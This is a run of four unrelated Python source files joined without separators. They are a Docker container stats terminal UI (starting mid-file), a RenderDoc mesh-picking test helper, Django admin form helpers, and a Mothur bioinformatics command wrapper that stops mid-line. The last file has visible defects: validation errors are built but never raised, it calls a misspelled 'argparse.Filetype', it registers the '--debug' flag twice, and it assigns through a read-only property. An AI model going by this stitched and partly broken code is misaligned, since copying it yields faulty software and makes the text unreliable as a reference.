blk_w_g = ContainerInfoGraph("graph_lines_blkio_w_tips", "graph_lines_blkio_w") net_r_g = ContainerInfoGraph("graph_lines_net_r_tips", "graph_lines_net_r") net_w_g = ContainerInfoGraph("graph_lines_net_w_tips", "graph_lines_net_w") cpu_label = ColorText("CPU ", "graph_lines_cpu_legend") cpu_value = ColorText("0.0 %", "graph_lines_cpu_legend") mem_label = ColorText("Memory ", "graph_lines_mem_legend") mem_value = ColorText("0.0 %", "graph_lines_mem_legend") blk_r_label = ColorText("I/O Read ", "graph_lines_blkio_r_legend") blk_r_value = ColorText("0 B", "graph_lines_blkio_r_legend") blk_w_label = ColorText("I/O Write ", "graph_lines_blkio_w_legend") blk_w_value = ColorText("0 B", "graph_lines_blkio_w_legend") net_r_label = ColorText("Net Rx ", "graph_lines_net_r_legend") net_r_value = ColorText("0 B", "graph_lines_net_r_legend") net_w_label = ColorText("Net Tx ", "graph_lines_net_w_legend") net_w_value = ColorText("0 B", "graph_lines_net_w_legend") self.walker.append(urwid.Columns([ BoxAdapter(cpu_g, 12), BoxAdapter(mem_g, 12), ("weight", 0.5, BoxAdapter(blk_r_g, 12)), ("weight", 0.5, BoxAdapter(blk_w_g, 12)), ("weight", 0.5, BoxAdapter(net_r_g, 12)), ("weight", 0.5, BoxAdapter(net_w_g, 12)), BoxAdapter(UnselectableListBox(urwid.SimpleFocusListWalker([ UnselectableRowWidget([(12, cpu_label), cpu_value]), UnselectableRowWidget([(12, mem_label), mem_value]), UnselectableRowWidget([(12, blk_r_label), blk_r_value]), UnselectableRowWidget([(12, blk_w_label), blk_w_value]), UnselectableRowWidget([(12, net_r_label), net_r_value]), UnselectableRowWidget([(12, net_w_label), net_w_value]), ])), 12), ])) self.walker.append(RowWidget([SelectableText("")])) @log_traceback def realtime_updates(): for update in self.docker_container.stats().response: if self.stop.is_set(): break logger.debug(update) cpu_percent = update["cpu_percent"] cpu_value.text = "%.2f %%" % cpu_percent cpu_g.rotate_value(int(cpu_percent), max_val=100) mem_percent = update["mem_percent"] mem_current = humanize_bytes(update["mem_current"]) mem_value.text = "%.2f %% (%s)" % (mem_percent, mem_current) mem_g.rotate_value(int(mem_percent), max_val=100) blk_read = update["blk_read"] blk_write = update["blk_write"] blk_r_value.text = humanize_bytes(blk_read) blk_w_value.text = humanize_bytes(blk_write) r_max_val = blk_r_g.rotate_value(blk_read, adaptive_max=True) w_max_val = blk_w_g.rotate_value(blk_write, adaptive_max=True) blk_r_g.set_max(max((r_max_val, w_max_val))) blk_w_g.set_max(max((r_max_val, w_max_val))) net_read = update["net_rx"] net_write = update["net_tx"] net_r_value.text = humanize_bytes(net_read) net_w_value.text = humanize_bytes(net_write) r_max_val = net_r_g.rotate_value(net_read, adaptive_max=True) w_max_val = net_w_g.rotate_value(net_write, adaptive_max=True) net_r_g.set_max(max((r_max_val, w_max_val))) net_w_g.set_max(max((r_max_val, w_max_val))) self.thread = threading.Thread(target=realtime_updates, daemon=True) self.thread.start() def _labels(self): if not self.docker_container.labels: return [] data = [] self.walker.append(RowWidget([SelectableText("Labels", maps=get_map("main_list_white"))])) for label_key, label_value in self.docker_container.labels.items(): data.append([SelectableText(label_key, maps=get_map("main_list_green")), SelectableText(label_value)]) self.walker.extend(assemble_rows(data, ignore_columns=[1])) def _process_tree(self): top = self.docker_container.top().response logger.debug(top) if top: self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Process Tree", maps=get_map("main_list_white"))])) self.walker.append(BoxAdapter(ProcessTree(top), len(top))) def _logs(self): operation = self.docker_container.logs(follow=False, lines=10) if operation.response: self.walker.append(RowWidget([SelectableText("")])) self.walker.append(RowWidget([SelectableText("Logs", maps=get_map("main_list_white"))])) for x in operation.response.splitlines(): self.walker.append(RowWidget([SelectableText(x)])) def destroy(self): self.stop.set()
import renderdoc as rd import rdtest # Not a real test, re-used by API-specific tests class Mesh_Zoo(): def __init__(self): self.out = None self.cfg = rd.MeshDisplay() def cache_output(self): self.out.SetMeshDisplay(self.cfg) self.out.Display() pixels: bytes = self.out.ReadbackOutputTexture() dim = self.out.GetDimensions() pitch = dim[0]*3 self.rows = [pixels[row_start:row_start + pitch] for row_start in range(0, dim[1] * pitch, pitch)] rdtest.png_save(rdtest.get_tmp_path('output.png'), self.rows, dim, False) def find_action(self, name): action = None for d in self.controller.GetRootActions(): if name in d.customName: action = d break if action is None: raise rdtest.TestFailureException("Couldn't find '{}' action".format(name)) return action # To avoid needing to do image comparisons, we instead do quad region probes to see which colours are present. That # way we can programmatically check that the wireframe we expect to be there, is there def get_region_cols(self, region): x0, y0, x1, y1 = region cols = [] for y in range(y0, y1+1): for x in range(x0, x1+1): col = tuple(self.rows[y][x*3:x*3+3]) # skip pure gray, this comes from the checkerboard or frustum, all our lines and data are coloured if col[0] == col[1] and col[1] == col[2]: continue if col not in cols: cols.append(col) return cols def check_region(self, region, test): colors = self.get_region_cols(region) if not test(colors): tmp_path = rdtest.get_tmp_path('output.png') rdtest.png_save(tmp_path, self.rows, self.out.GetDimensions(), False) raise rdtest.TestFailureException("Expected line segment wrong, colors: {}".format(colors), tmp_path) def check_vertex(self, x, y, result): pick = self.out.PickVertex(x, y) if not rdtest.value_compare(result, pick): raise rdtest.TestFailureException("When picking ({},{}) expected vertex {} in instance {}, but found {} in {}".format(x, y, result[0], result[1], pick[0], pick[1])) rdtest.log.success("Picking {},{} returns vertex {} in instance {} as expected".format(x, y, result[0], result[1])) def check_capture(self, capture_filename: str, controller: rd.ReplayController): self.controller = controller self.controller.SetFrameEvent(self.find_action("Quad").next.eventId, False) self.out: rd.ReplayOutput = self.controller.CreateOutput(rd.CreateHeadlessWindowingData(200, 200), rd.ReplayOutputType.Mesh) pipe: rd.PipeState = self.controller.GetPipelineState() self.cfg = rd.MeshDisplay() cam: rd.Camera = rd.InitCamera(rd.CameraType.FPSLook) cam.SetPosition(0, 0, 0) cam.SetFPSRotation(0, 0, 0) self.cfg.type = rd.MeshDataStage.VSOut self.cfg.cam = cam # Position is always first, so getting the postvs data will give us inst0: rd.MeshFormat = self.controller.GetPostVSData(0, 0, self.cfg.type) self.cfg.position = inst0 # after position we have float2 Color2 then float4 Color4 self.cfg.second = self.cfg.position self.cfg.second.vertexByteOffset += 16 self.cfg.second.vertexByteOffset += 8 if pipe.HasAlignedPostVSData(self.cfg.type): self.cfg.second.vertexByteOffset += 8 # Configure an ortho camera, even though we don't really have a camera self.cfg.ortho = True self.cfg.position.nearPlane = 1.0 self.cfg.position.farPlane = 100.0 self.cfg.aspect = 1.0 self.cfg.wireframeDraw = True self.cfg.position.meshColor = rd.FloatVector(1.0, 0.0, 1.0, 1.0) self.cache_output() # We should have a single quad, check each outside edge and the inside diagonal. # All these line segments should have some colors (not including the background checkerboard or the frustum) self.check_region((55, 95, 65, 95), lambda x: x != []) # Left edge self.check_region((85, 60, 85, 70), lambda x: x != []) # Top edge self.check_region((105, 100, 115, 100), lambda x: x != []) # Right edge self.check_region((90, 130, 90, 140), lambda x: x != []) # Bottom edge self.check_region((65, 120, 75, 120), lambda x: x != []) # Bottom-Left of diagonal self.check_region((105, 70, 110, 70), lambda x: x != []) # Top-right of diagonal rdtest.log.success("Base rendering is as expected") self.cfg.solidShadeMode = rd.SolidShade.Secondary self.cfg.wireframeDraw = False # allow for blending with white for the frustum isred = lambda col: col[0] > col[1] and col[1] == col[2] isgreen = lambda col: col[1] > col[0] and col[0] == col[2] isblue = lambda col: col[2] > col[0] and col[0] == col[1] isredgreen = lambda col: isred(col) or isgreen(col) or col[2] == 0 isyellow = lambda col: col[0] == col[1] and col[2] < col[1] self.cache_output() # The secondary color should be completely green self.check_region((85, 70, 85, 125), lambda x: all([isgreen(i) for i in x])) self.check_region((65, 100, 105, 100), lambda x: all([isgreen(i) for i in x])) # this line segment isn't in the first instance self.check_region((65, 55, 105, 55), lambda x: x == []) # this line segment isn't in the second instance self.check_region((65, 125, 105, 125), lambda x: all([isgreen(i) for i in x])) rdtest.log.success("Secondary rendering of instance 0 is as expected") # Out of bounds should look the same as without highlighting at all, check the corners are all still green self.cfg.highlightVert = 9 self.cache_output() self.check_region((55, 60, 65, 70), lambda x: all([isgreen(i) for i in x])) self.check_region((105, 60, 115, 70), lambda x: all([isgreen(i) for i in x])) self.check_region((55, 130, 65, 140), lambda x: all([isgreen(i) for i in x])) self.check_region((105, 130, 115, 140), lambda x: all([isgreen(i) for i in x])) vert_regions = [ (55, 60, 65, 70), (110, 60, 120, 70), (55, 130, 65, 140), (110, 60, 120, 70), (110, 130, 120, 140), (55, 130, 65, 140), ] for vert in range(6): self.cfg.highlightVert = vert self.cache_output() tri = int(vert / 3) # Check that the triangle we're highlighting is red and the other is green if tri == 0: self.check_region((65, 75, 75, 85), lambda x: all([isred(i) for i in x])) self.check_region((100, 115, 110, 125), lambda x: all([isgreen(i) for i in x])) else: self.check_region((65, 75, 75, 85), lambda x: all([isgreen(i) for i in x])) self.check_region((100, 115, 110, 125), lambda x: all([isred(i) for i in x])) # The corners that touch should be red and green - that is no other colours but red and green, but at least # some red and some green self.check_region((65, 115, 75, 125), lambda x: all([isredgreen(i) for i in x]) and any([isred(i) for i in x]) and any([isgreen(i) for i in x])) # check that there's blue in this vertex's region self.check_region(vert_regions[vert], lambda x: any([isblue(i) for i in x])) rdtest.log.success("Rendering of highlighted vertices is as expected") self.cfg.highlightVert = rd.MeshDisplay.NoHighlight # If we render from the float2 color we shouldn't get any blue self.cfg.second.vertexByteOffset = self.cfg.position.vertexByteOffset = inst0.vertexByteOffset self.cfg.second.vertexByteOffset += 16 self.cfg.second.format.compCount = 2 self.cache_output() # If we render from the float2 color we shouldn't get any blue since it's only a two-component value self.check_region((85, 70, 85, 125), lambda x: all([isredgreen(i) for i in x])) self.check_region((65, 100, 105, 100), lambda x: all([isredgreen(i) for i in x])) self.check_region((65, 55, 105, 55), lambda x: x == []) self.check_region((65, 125, 105, 125), lambda x: all([isredgreen(i) for i in x])) rdtest.log.success("Rendering of float2 color secondary in instance 0 is as expected") self.cfg.highlightVert = rd.MeshDisplay.NoHighlight inst1: rd.MeshFormat = self.controller.GetPostVSData(1, 0, self.cfg.type) self.cfg.curInstance = 1 self.cfg.second.vertexResourceId = self.cfg.position.vertexResourceId = inst1.vertexResourceId self.cfg.second.vertexByteOffset = self.cfg.position.vertexByteOffset = inst1.vertexByteOffset self.cfg.second.vertexByteOffset += 16 self.cfg.second.vertexByteOffset += 8 if pipe.HasAlignedPostVSData(self.cfg.type): self.cfg.second.vertexByteOffset += 8 self.cache_output() # The secondary color should be completely yellow self.check_region((85, 70, 85, 125), lambda x: all([isyellow(i) for i in x])) self.check_region((65, 100, 105, 100), lambda x: all([isyellow(i) for i in x])) # this line segment isn't in the first instance self.check_region((65, 55, 105, 55), lambda x: all([isyellow(i) for i in x])) # this line segment isn't in the second instance self.check_region((65, 125, 105, 125), lambda x: x == []) rdtest.log.success("Secondary rendering of instance 1 is as expected") # If we render from the float2 color we shouldn't get any blue self.cfg.second.vertexByteOffset = self.cfg.position.vertexByteOffset = inst1.vertexByteOffset self.cfg.second.vertexByteOffset += 16 self.cfg.second.format.compCount = 2 self.cache_output() # If we render from the float2 color we shouldn't get any blue since it's only a two-component value self.check_region((85, 70, 85, 125), lambda x: all([isredgreen(i) for i in x])) self.check_region((65, 100, 105, 100), lambda x: all([isredgreen(i) for i in x])) self.check_region((65, 55, 105, 55), lambda x: all([isredgreen(i) for i in x])) self.check_region((65, 125, 105, 125), lambda x: x == []) rdtest.log.success("Rendering of float2 color secondary in instance 1 is as expected") self.cfg.solidShadeMode = rd.SolidShade.NoSolid self.cfg.showAllInstances = True self.cache_output() # wireframe for original quad should still be present self.check_region((55, 95, 65, 95), lambda x: x != []) self.check_region((85, 60, 85, 70), lambda x: x != []) self.check_region((105, 100, 115, 100), lambda x: x != []) self.check_region((90, 130, 90, 140), lambda x: x != []) self.check_region((65, 120, 75, 120), lambda x: x != []) self.check_region((105, 70, 110, 70), lambda x: x != []) # But now we'll have an additional instance self.check_region((75, 55, 85, 55), lambda x: x != []) self.check_region((125, 85, 135, 85), lambda x: x != []) self.check_region((105, 110, 105, 120), lambda x: x != []) self.cfg.showWholePass = True self.cache_output() # same again self.check_region((55, 95, 65, 95), lambda x: x != []) self.check_region((85, 60, 85, 70), lambda x: x != []) self.check_region((105, 100, 115, 100), lambda x: x != []) self.check_region((90, 130, 90, 140), lambda x: x != []) self.check_region((65, 120, 75, 120), lambda x: x != []) self.check_region((105, 70, 110, 70), lambda x: x != []) self.check_region((75, 55, 85, 55), lambda x: x != []) self.check_region((125, 85, 135, 85), lambda x: x != []) self.check_region((105, 110, 105, 120), lambda x: x != []) # But now an extra previous action self.check_region((30, 105, 40, 105), lambda x: x != []) self.check_region((50, 80, 50, 90), lambda x: x != []) self.check_region((45, 130, 55, 130), lambda x: x != []) self.check_region((30, 150, 40, 150), lambda x: x != []) rdtest.log.success("Mesh rendering is as expected") self.cfg.showWholePass = False self.cfg.showAllInstances = False # Go back to instance 0. We can ignore cfg.second now self.cfg.curInstance = 0 self.cfg.position.vertexResourceId = inst0.vertexResourceId self.cfg.position.vertexByteOffset = inst0.vertexByteOffset self.cache_output() # Just above top-left, no result self.check_vertex(55, 60, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) # Just inside top-left, first vertex self.check_vertex(65, 70, (0, 0)) # Outside top-right, inside the second instance, but because we only have one instance showing should return # no result self.check_vertex(115, 60, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) self.check_vertex(80, 60, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) # In the first triangle near the top right self.check_vertex(105, 70, (1, 0)) # In the second triangle near the top right self.check_vertex(110, 70, (3, 0)) # In the second triangle near the middle, would be in the second instance self.check_vertex(95, 110, (4, 0)) # In the second triangle near the bottom right self.check_vertex(110, 130, (4, 0)) rdtest.log.success("Instance 0 picking is as expected") # if we look at only instance 1, the results should change self.cfg.curInstance = 1 self.cfg.position.vertexResourceId = inst1.vertexResourceId self.cfg.position.vertexByteOffset = inst1.vertexByteOffset self.cache_output() self.check_vertex(55, 60, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) self.check_vertex(65, 70, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) self.check_vertex(115, 60, (1, 1)) self.check_vertex(80, 60, (0, 1)) self.check_vertex(105, 70, (1, 1)) self.check_vertex(110, 70, (1, 1)) self.check_vertex(95, 110, (5, 1)) self.check_vertex(110, 130, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) rdtest.log.success("Instance 1 picking is as expected") # Now look at both instances together, this goes 'in order' so if there is overlap the first instance wins self.cfg.showAllInstances = True self.cache_output() self.check_vertex(55, 60, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) self.check_vertex(65, 70, (0, 0)) self.check_vertex(115, 60, (1, 1)) self.check_vertex(80, 60, (0, 1)) self.check_vertex(105, 70, (1, 0)) self.check_vertex(110, 70, (3, 0)) self.check_vertex(95, 110, (4, 0)) self.check_vertex(110, 130, (4, 0)) rdtest.log.success("Both instance picking is as expected") self.controller.SetFrameEvent(self.find_action("Points").next.eventId, False) # Only one instance, just check we can see the points self.cfg.curInstance = 0 self.cfg.position = self.controller.GetPostVSData(0, 0, self.cfg.type) self.cfg.position.nearPlane = 1.0 self.cfg.position.farPlane = 100.0 self.cache_output() # Picking points doesn't have any primitive, it should pick as long as it's close to the point self.check_vertex(55, 60, (0, 0)) self.check_vertex(65, 70, (0, 0)) self.check_vertex(105, 65, (1, 0)) self.check_vertex(115, 135, (2, 0)) self.check_vertex(65, 130, (3, 0)) self.check_vertex(60, 125, (3, 0)) rdtest.log.success("Point picking is as expected") self.controller.SetFrameEvent(self.find_action("Stride 0").next.eventId, False) self.cfg.position = self.controller.GetPostVSData(0, 0, self.cfg.type) self.cfg.position.nearPlane = 1.0 self.cfg.position.farPlane = 100.0 self.cache_output() # Stride of 0 is unusual but valid, ensure vertex picking still works self.check_vertex(55, 60, (0, 0)) self.check_vertex(65, 70, (0, 0)) self.check_vertex(105, 65, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult)) self.check_vertex(115, 135, (rd.ReplayOutput.NoResult, rd.ReplayOutput.NoResult))
from __future__ import unicode_literals import json import warnings from django import forms from django.conf import settings from django.contrib.admin.utils import ( display_for_field, flatten_fieldsets, help_text_for_field, label_for_field, lookup_field, ) from django.core.exceptions import ObjectDoesNotExist from django.db.models.fields.related import ManyToManyRel from django.forms.utils import flatatt from django.template.defaultfilters import capfirst, linebreaksbr from django.utils import six from django.utils.deprecation import RemovedInDjango20Warning from django.utils.encoding import force_text from django.utils.html import conditional_escape, format_html from django.utils.safestring import mark_safe from django.utils.translation import ugettext, ugettext_lazy as _ ACTION_CHECKBOX_NAME = '_selected_action' class ActionForm(forms.Form): action = forms.ChoiceField(label=_('Action:')) select_across = forms.BooleanField( label='', required=False, initial=0, widget=forms.HiddenInput({'class': 'select-across'}), ) checkbox = forms.CheckboxInput({'class': 'action-select'}, lambda value: False) class AdminForm(object): def __init__(self, form, fieldsets, prepopulated_fields, readonly_fields=None, model_admin=None): self.form, self.fieldsets = form, fieldsets self.prepopulated_fields = [{ 'field': form[field_name], 'dependencies': [form[f] for f in dependencies] } for field_name, dependencies in prepopulated_fields.items()] self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields def __iter__(self): for name, options in self.fieldsets: yield Fieldset( self.form, name, readonly_fields=self.readonly_fields, model_admin=self.model_admin, **options ) @property def errors(self): return self.form.errors @property def non_field_errors(self): return self.form.non_field_errors @property def media(self): media = self.form.media for fs in self: media = media + fs.media return media class Fieldset(object): def __init__(self, form, name=None, readonly_fields=(), fields=(), classes=(), description=None, model_admin=None): self.form = form self.name, self.fields = name, fields self.classes = ' '.join(classes) self.description = description self.model_admin = model_admin self.readonly_fields = readonly_fields @property def media(self): if 'collapse' in self.classes: extra = '' if settings.DEBUG else '.min' js = [ 'vendor/jquery/jquery%s.js' % extra, 'jquery.init.js', 'collapse%s.js' % extra, ] return forms.Media(js=['admin/js/%s' % url for url in js]) return forms.Media() def __iter__(self): for field in self.fields: yield Fieldline(self.form, field, self.readonly_fields, model_admin=self.model_admin) class Fieldline(object): def __init__(self, form, field, readonly_fields=None, model_admin=None): self.form = form # A django.forms.Form instance if not hasattr(field, "__iter__") or isinstance(field, six.text_type): self.fields = [field] else: self.fields = field self.has_visible_field = not all( field in self.form.fields and self.form.fields[field].widget.is_hidden for field in self.fields ) self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields def __iter__(self): for i, field in enumerate(self.fields): if field in self.readonly_fields: yield AdminReadonlyField(self.form, field, is_first=(i == 0), model_admin=self.model_admin) else: yield AdminField(self.form, field, is_first=(i == 0)) def errors(self): return mark_safe( '\n'.join( self.form[f].errors.as_ul() for f in self.fields if f not in self.readonly_fields ).strip('\n') ) class AdminField(object): def __init__(self, form, field, is_first): self.field = form[field] # A django.forms.BoundField instance self.is_first = is_first # Whether this field is first on the line self.is_checkbox = isinstance(self.field.field.widget, forms.CheckboxInput) self.is_readonly = False def label_tag(self): classes = [] contents = conditional_escape(force_text(self.field.label)) if self.is_checkbox: classes.append('vCheckboxLabel') if self.field.field.required: classes.append('required') if not self.is_first: classes.append('inline') attrs = {'class': ' '.join(classes)} if classes else {} # checkboxes should not have a label suffix as the checkbox appears # to the left of the label. return self.field.label_tag( contents=mark_safe(contents), attrs=attrs, label_suffix='' if self.is_checkbox else None, ) def errors(self): return mark_safe(self.field.errors.as_ul()) class AdminReadonlyField(object): def __init__(self, form, field, is_first, model_admin=None): # Make self.field look a little bit like a field. This means that # {{ field.name }} must be a useful class name to identify the field. # For convenience, store other field-related data here too. if callable(field): class_name = field.__name__ if field.__name__ != '<lambda>' else '' else: class_name = field if form._meta.labels and class_name in form._meta.labels: label = form._meta.labels[class_name] else: label = label_for_field(field, form._meta.model, model_admin) if form._meta.help_texts and class_name in form._meta.help_texts: help_text = form._meta.help_texts[class_name] else: help_text = help_text_for_field(class_name, form._meta.model) self.field = { 'name': class_name, 'label': label, 'help_text': help_text, 'field': field, } self.form = form self.model_admin = model_admin self.is_first = is_first self.is_checkbox = False self.is_readonly = True self.empty_value_display = model_admin.get_empty_value_display() def label_tag(self): attrs = {} if not self.is_first: attrs["class"] = "inline" label = self.field['label'] return format_html('<label{}>{}:</label>', flatatt(attrs), capfirst(force_text(label))) def contents(self): from django.contrib.admin.templatetags.admin_list import _boolean_icon field, obj, model_admin = self.field['field'], self.form.instance, self.model_admin try: f, attr, value = lookup_field(field, obj, model_admin) except (AttributeError, ValueError, ObjectDoesNotExist): result_repr = self.empty_value_display else: if f is None: boolean = getattr(attr, "boolean", False) if boolean: result_repr = _boolean_icon(value) else: if hasattr(value, "__html__"): result_repr = value else: result_repr = force_text(value) if getattr(attr, "allow_tags", False): warnings.warn( "Deprecated allow_tags attribute used on %s. " "Use django.utils.html.format_html(), format_html_join(), " "or django.utils.safestring.mark_safe() instead." % attr, RemovedInDjango20Warning ) result_repr = mark_safe(value) else: result_repr = linebreaksbr(result_repr) else: if isinstance(f.remote_field, ManyToManyRel) and value is not None: result_repr = ", ".join(map(six.text_type, value.all())) else: result_repr = display_for_field(value, f, self.empty_value_display) result_repr = linebreaksbr(result_repr) return conditional_escape(result_repr) class InlineAdminFormSet(object): """ A wrapper around an inline formset for use in the admin system. """ def __init__(self, inline, formset, fieldsets, prepopulated_fields=None, readonly_fields=None, model_admin=None): self.opts = inline self.formset = formset self.fieldsets = fieldsets self.model_admin = model_admin if readonly_fields is None: readonly_fields = () self.readonly_fields = readonly_fields if prepopulated_fields is None: prepopulated_fields = {} self.prepopulated_fields = prepopulated_fields self.classes = ' '.join(inline.classes) if inline.classes else '' def __iter__(self): for form, original in zip(self.formset.initial_forms, self.formset.get_queryset()): view_on_site_url = self.opts.get_view_on_site_url(original) yield InlineAdminForm( self.formset, form, self.fieldsets, self.prepopulated_fields, original, self.readonly_fields, model_admin=self.opts, view_on_site_url=view_on_site_url, ) for form in self.formset.extra_forms: yield InlineAdminForm( self.formset, form, self.fieldsets, self.prepopulated_fields, None, self.readonly_fields, model_admin=self.opts, ) yield InlineAdminForm( self.formset, self.formset.empty_form, self.fieldsets, self.prepopulated_fields, None, self.readonly_fields, model_admin=self.opts, ) def fields(self): fk = getattr(self.formset, "fk", None) for i, field_name in enumerate(flatten_fieldsets(self.fieldsets)): if fk and fk.name == field_name: continue if field_name in self.readonly_fields: yield { 'label': label_for_field(field_name, self.opts.model, self.opts), 'widget': {'is_hidden': False}, 'required': False, 'help_text': help_text_for_field(field_name, self.opts.model), } else: form_field = self.formset.empty_form.fields[field_name] label = form_field.label if label is None: label = label_for_field(field_name, self.opts.model, self.opts) yield { 'label': label, 'widget': form_field.widget, 'required': form_field.required, 'help_text': form_field.help_text, } def inline_formset_data(self): verbose_name = self.opts.verbose_name return json.dumps({ 'name': '#%s' % self.formset.prefix, 'options': { 'prefix': self.formset.prefix, 'addText': ugettext('Add another %(verbose_name)s') % { 'verbose_name': capfirst(verbose_name), }, 'deleteText': ugettext('Remove'), } }) @property def forms(self): return self.formset.forms @property def non_form_errors(self): return self.formset.non_form_errors @property def media(self): media = self.opts.media + self.formset.media for fs in self: media = media + fs.media return media class InlineAdminForm(AdminForm): """ A wrapper around an inline form for use in the admin system. """ def __init__(self, formset, form, fieldsets, prepopulated_fields, original, readonly_fields=None, model_admin=None, view_on_site_url=None): self.formset = formset self.model_admin = model_admin self.original = original self.show_url = original and view_on_site_url is not None self.absolute_url = view_on_site_url super(InlineAdminForm, self).__init__(form, fieldsets, prepopulated_fields, readonly_fields, model_admin) def __iter__(self): for name, options in self.fieldsets: yield InlineFieldset( self.formset, self.form, name, self.readonly_fields, model_admin=self.model_admin, **options ) def needs_explicit_pk_field(self): # Auto fields are editable (oddly), so need to check for auto or non-editable pk if self.form._meta.model._meta.has_auto_field or not self.form._meta.model._meta.pk.editable: return True # Also search any parents for an auto field. (The pk info is propagated to child # models so that does not need to be checked in parents.) for parent in self.form._meta.model._meta.get_parent_list(): if parent._meta.has_auto_field: return True return False def pk_field(self): return AdminField(self.form, self.formset._pk_field.name, False) def fk_field(self): fk = getattr(self.formset, "fk", None) if fk: return AdminField(self.form, fk.name, False) else: return "" def deletion_field(self): from django.forms.formsets import DELETION_FIELD_NAME return AdminField(self.form, DELETION_FIELD_NAME, False) def ordering_field(self): from django.forms.formsets import ORDERING_FIELD_NAME return AdminField(self.form, ORDERING_FIELD_NAME, False) class InlineFieldset(Fieldset): def __init__(self, formset, *args, **kwargs): self.formset = formset super(InlineFieldset, self).__init__(*args, **kwargs) def __iter__(self): fk = getattr(self.formset, "fk", None) for field in self.fields: if fk and fk.name == field: continue yield Fieldline(self.form, field, self.readonly_fields, model_admin=self.model_admin) class AdminErrorList(forms.utils.ErrorList): """ Stores all errors for the form/formsets in an add/change stage view. """ def __init__(self, form, inline_formsets): super(AdminErrorList, self).__init__() if form.is_bound: self.extend(form.errors.values()) for inline_formset in inline_formsets: self.extend(inline_formset.non_form_errors()) for errors_in_inline_form in inline_formset.errors: self.extend(errors_in_inline_form.values())
import logging import subprocess from pbrdna.utils import which, is_executable log = logging.getLogger(__name__) VALID_COMMANDS = frozenset(['fastq.info', 'align.seqs', 'chimera.uchime', 'screen.seqs', 'remove.seqs', 'filter.seqs', 'summary.seqs', 'dist.seqs', 'unique.seqs', 'trim.seqs', 'pre.cluster', 'cluster', 'set.logfile']) NUMPROC_COMMANDS = frozenset(['align.seqs', 'chimera.uchime', 'screen.seqs', 'filter.seqs', 'dist.seqs']) VALID_PARAMS = frozenset(['fasta', 'fastq', 'qfile', 'reference', 'name', 'flip', 'start', 'end', 'minlength', 'processors', 'vertical', 'trump', 'calc', 'output', 'phylip', 'method', 'accnos', 'countends', 'qaverage', 'diffs', 'name']) class MothurCommand(object): """ A class for representing individual Mothur Commands """ def __init__(self, command, parameters): # Validate the selected Mothur Command try: assert command.lower() in VALID_COMMANDS self._command = command.lower() except AssertionError: ValueError("Invalid Mothur command") # Validate the arguments for the command self._parameters = {} for param, value in parameters.iteritems(): try: assert param in VALID_PARAMS self.parameters[param] = value except AssertionError: ValueError('Invalid Mothur argument') @property def command(self): return self._command @property def parameters(self): return self._parameters @property def parameterString(self): return ", ".join(["%s=%s"%(p,v) for p, v in self.parameters.iteritems() if v is not None]) def __str__(self): return "%s(%s)" % (self.command, self.parameterString) class MothurJob(object): """ A class for representing Mothur calls of 1-or-more commands """ def __init__(self, mothurExe, commands, stdout=None, stderr=None): # Validate the supplied Mothur executable try: assert is_executable(mothurExe) self._mothur = mothurExe except AssertionError: raise ValueError("Mothur executable is not valid!") # Validate the supplied Mothur commands self._commands = [] for command in commands: try: assert isinstance(command, MothurCommand) self._commands.append( command ) except: raise ValueError("Argument is not a MothurCommand!") self.stdout = stdout self.stderr = stderr @property def mothur(self): return self._mothur @property def commands(self): return self._commands @property def commandString(self): return "; ".join( map(str, self.commands) ) @property def callString(self): return '#%s' % self.commandString @property def displayString(self): return '\n\t%s\n\t\t%s' %(self.mothur, "\n\t\t".join(map(str, self.commands)) ) def __str__(self): return '%s "%s"' % (self.mothur, self.callString) def __call__(self): log.info('Executing the following command: %s' % self.displayString) p = subprocess.Popen( [self.mothur, self.callString], stdout=self.stdout, stderr=self.stderr ) stdout, stderr = p.communicate() log.info('Mothur command exited successfully') class MothurRunner(object): """ A Factory-style tool for creating run-able MothurCommand objects """ ##################### # Variable Defaults # ##################### NUM_PROC = 1 ########################## # Initialization Methods # ########################## def __init__(self, mothurExe=None, numProc=None, stdout=None, stderr=None): if mothurExe is None: self.initializeFromArgs() else: self.initializeFromCall(mothurExe, numProc, stdout, stderr) self.validateSettings() def initializeFromArgs(self): import argparse desc = 'A tool for calling Mothur commands from Python' parser = argparse.ArgumentParser(description=desc) parser.add_argument('-n', '--num_processes', type=int, metavar='INT', dest='numProc', default=self.NUM_PROC, help="Number of processors to use") parser.add_argument('--mothur', metavar='MOTHUR_PATH', dest='mothurExe', help="Specify the path to the Mothur executable") parser.add_argument('--stdout', metavar='OUT', type=argparse.Filetype('a'), help="Pipe Mothur's STDOUT to specified file") parser.add_argument('--stderr', metavar='ERR', type=argparse.FileType('a'), help="Pipe Mothur's STDERR to specified file") parser.add_argument('--debug', action='store_true', help="Turn on DEBUG message logging") parser.add_argument('--debug', action='store_true', help="Turn on DEBUG message logging") args = parser.parse_args() self.__dict__.update( vars(args) ) def initializeFromCall(self, mothurExe, numProc, stdout, stderr): self.mothurExe = mothurExe self.numProc = numProc # Set the output handle for STDOUT if stdout is None: self.stdout = None else: self.stdout = open(stdout, 'a') # Set the output handle for STDERR if stderr is None: self.stderr = None else: self.stderr = open(stderr, 'a') def validateSettings(self): # Search for Mothur executable if not supplied if self.mothurExe is None: self.mothur = which('mothur') if self.mothur is None: raise OSError('Mothur executable not found!') # If an argument was given, check that it's executable elif is_executable( self.mothurExe ): self.mothur = self.mothurExe else: raise OSError('Supplied Mothur executable not valid!') # Validate the Num_Processes argument try: assert self.numProc >= 1 except AssertionError: raise ValueError("Number of processes must be >= 1!") self.numProc = str(self.numProc) #################### # Instance Methods # #################### def createJob(self, command, parameters, logFile=None): commands = [] log.info('Creating a MothurCommand for "%s"' % command) # Check the logFile and create it if needed if logFile is None: log.info('No log-file specified for this job') else: log.info('Setting the log-file to "%s"' % logFile) logParams = {'name':logFile} logCommand = MothurCommand('set.logfile', logParams) commands.append( logCommand ) parameters = self.addDefaultParameters( command, parameters ) mainCommand = MothurCommand( command, parameters ) commands.append( mainCommand ) return MothurJob(self.mothur, 